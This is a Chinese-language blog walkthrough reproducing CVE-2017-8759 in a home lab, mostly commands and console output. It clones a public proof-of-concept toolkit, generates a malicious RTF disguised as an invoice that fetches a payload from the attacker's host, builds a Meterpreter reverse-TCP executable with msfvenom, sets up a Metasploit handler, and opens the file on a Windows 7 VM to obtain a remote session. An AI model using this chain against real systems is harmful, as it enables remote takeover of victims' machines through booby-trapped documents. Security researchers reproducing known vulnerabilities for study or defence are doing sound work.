CVE-2017-8759漏洞复现

漏洞介绍:http://www.freebuf.com/articles/system/147602.html

贴上POC地址:https://github.com/bhdresh/CVE-2017-8759

由于kali2.0太卡,已被我抛弃,目前使用parrot系统。

先用命令将POC下载到本地

git clone https://github.com/bhdresh/CVE-2017-8759

CVE-2017-8759漏洞复现

我们进入到CVE-2017-8759这个文件夹,打开README.md文件查看下使用方法

sudo pluma README.md

CVE-2017-8759漏洞复现

1
2
3
4
5
6
7
8
###### Example commands
1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

我们先用命令python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.0.124/test.txt生成一个恶意的RTF文件(先用ifconfig命令查看下自己的IP,将里面的IP修改为自己的IP,我这里是192.168.0.124)

CVE-2017-8759漏洞复现

可以看到生成成功了,我们ls看下是否有这个文件

CVE-2017-8759漏洞复现

然后第二步,用msf生成Payload。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f exe > /tmp/shell.exe

CVE-2017-8759漏洞复现

然后用msfconsole启动msf,需要等待些时间。

等启动好后我们配置下msf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
msf > use exploit/multi/handler 
msf exploit(handler) > set payload set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set lhost 192.168.0.124
lhost => 192.168.0.124
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.124 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.124:4444

CVE-2017-8759漏洞复现

CVE-2017-8759漏洞复现

监听成功,我们进行最后一步

python cve-2017-8759_toolkit.py -M exp -e http://192.168.0.124/shell.exe -l /tmp/shell.exe

CVE-2017-8759漏洞复现

我们把rtf文件拖动到win7虚拟机下打开

CVE-2017-8759漏洞复现

可以看到有反弹回来的信息了,不过貌似这系统的msf有问题,卡在那了

CVE-2017-8759漏洞复现

我们按ctrl+c停止,再session -l查看下会话列表

session -i选择会话

CVE-2017-8759漏洞复现

成功,接下来怎么玩,我相信各位大佬比我清楚。

有POC就是牛逼。

-------------本文结束感谢您的阅读-------------